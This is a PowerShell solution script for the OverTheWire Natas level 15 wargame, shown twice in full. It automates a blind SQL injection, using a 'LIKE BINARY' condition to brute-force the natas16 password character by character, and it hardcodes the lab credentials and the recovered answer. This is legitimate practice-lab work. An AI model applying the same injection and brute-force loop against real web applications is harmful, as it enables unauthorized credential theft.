taco-shellcode/natas16_sql_bruteforce.ps1

## natas16_sql_bruteforce.ps1
#natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
#http://natas15.natas.labs.overthewire.org/index.php?&debug&username=natas16" AND password LIKE BINARY "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh%

Function BruteForce-Password() {
    $credentials = Get-AuthorizedCredentials
    $bruteForceArray = Create-CharacterArray
    $password = ''
    $continueCracking = $true

    while($continueCracking) {
        for($i=0; $i -le $bruteforceArray.length) {
            $testCharacter = $bruteforceArray[$i]

            # SQL injection query used to test if the user natas16 exist and test if current character of the password matches the test character
            $sqlQuery = "natas16`" AND password LIKE BINARY `"$password$testCharacter%"

            $results = Test-Password $credentials $sqlQuery

            if ($results -eq $true) {
                $password += $testCharacter
                Write-Host "PASSED - Adding '$testCharacter' to password."
                Write-Host "PASSWORD: $password"
                $i = 0
            } else {
                Write-Host "FAILED - '$testCharacter' does not match the current position.  Testing next character"
                $i++
            }

            if ($i -ge $bruteforceArray.length) {
                Write-Host "All possible characters have been exhausted.  End of password has been reached."
                return $password
            }
        }
    }
}


# Credentials used to authenticate to the http://natas15.natas.labs.overthewire.org
Function Get-AuthorizedCredentials() {
    $authorized_user = 'natas15'
    $authorized_password = ConvertTo-SecureString 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J' -AsPlainText -Force
    $authorized_credentials = New-Object System.Management.Automation.PSCredential($authorized_user, $authorized_password)

    return $authorized_credentials
}


Function Create-CharacterArray() {
    # Creates an array with all 62 alphanumeric UPPER and lower case characters: (a-z A-Z 0-9)
    $characterArray = [char[]]([int][char]'A'..[int][char]'Z') + [char[]]([int][char]'a'..[int][char]'z') + 0..9

    return $characterArray
}


Function Test-Password($credentials, $sqlQuery) {
    # Captures the response of the web request using the POST HTTP method
    $httpResponse = Invoke-WebRequest -Method 'POST' -Uri "http://natas15.natas.labs.overthewire.org/index.php?&debug&username=$sqlQuery" -Credential $credentials

    # Checks to see if the string 'exists' is present in the HTTP response
    if ($httpResponse.Content.Contains('exists')) {
        return $true
    } else {
        return $false
    }
}

$start = Get-Date
$crackedPassword = BruteForce-Password
$end = Get-Date
$totalTime = $end - $start
Write-Host "The cracked password is: $($crackedPassword)"
Write-Host $totalTime
	#natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
	#http://natas15.natas.labs.overthewire.org/index.php?&debug&username=natas16" AND password LIKE BINARY "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh%

	Function BruteForce-Password() {
	$credentials = Get-AuthorizedCredentials
	$bruteForceArray = Create-CharacterArray
	$password = ''
	$continueCracking = $true

	while($continueCracking) {
	for($i=0; $i -le $bruteforceArray.length) {
	$testCharacter = $bruteforceArray[$i]

	# SQL injection query used to test if the user natas16 exist and test if current character of the password matches the test character
	$sqlQuery = "natas16`" AND password LIKE BINARY `"$password$testCharacter%"

	$results = Test-Password $credentials $sqlQuery

	if ($results -eq $true) {
	$password += $testCharacter
	Write-Host "PASSED - Adding '$testCharacter' to password."
	Write-Host "PASSWORD: $password"
	$i = 0
	} else {
	Write-Host "FAILED - '$testCharacter' does not match the current position. Testing next character"
	$i++
	}

	if ($i -ge $bruteforceArray.length) {
	Write-Host "All possible characters have been exhausted. End of password has been reached."
	return $password
	}
	}
	}
	}


	# Credentials used to authenticate to the http://natas15.natas.labs.overthewire.org
	Function Get-AuthorizedCredentials() {
	$authorized_user = 'natas15'
	$authorized_password = ConvertTo-SecureString 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J' -AsPlainText -Force
	$authorized_credentials = New-Object System.Management.Automation.PSCredential($authorized_user, $authorized_password)

	return $authorized_credentials
	}


	Function Create-CharacterArray() {
	# Creates an array with all 62 alphanumeric UPPER and lower case characters: (a-z A-Z 0-9)
	$characterArray = [char[]]([int][char]'A'..[int][char]'Z') + [char[]]([int][char]'a'..[int][char]'z') + 0..9

	return $characterArray
	}


	Function Test-Password($credentials, $sqlQuery) {
	# Captures the response of the web request using the POST HTTP method
	$httpResponse = Invoke-WebRequest -Method 'POST' -Uri "http://natas15.natas.labs.overthewire.org/index.php?&debug&username=$sqlQuery" -Credential $credentials

	# Checks to see if the string 'exists' is present in the HTTP response
	if ($httpResponse.Content.Contains('exists')) {
	return $true
	} else {
	return $false
	}
	}

	$start = Get-Date
	$crackedPassword = BruteForce-Password
	$end = Get-Date
	$totalTime = $end - $start
	Write-Host "The cracked password is: $($crackedPassword)"
	Write-Host $totalTime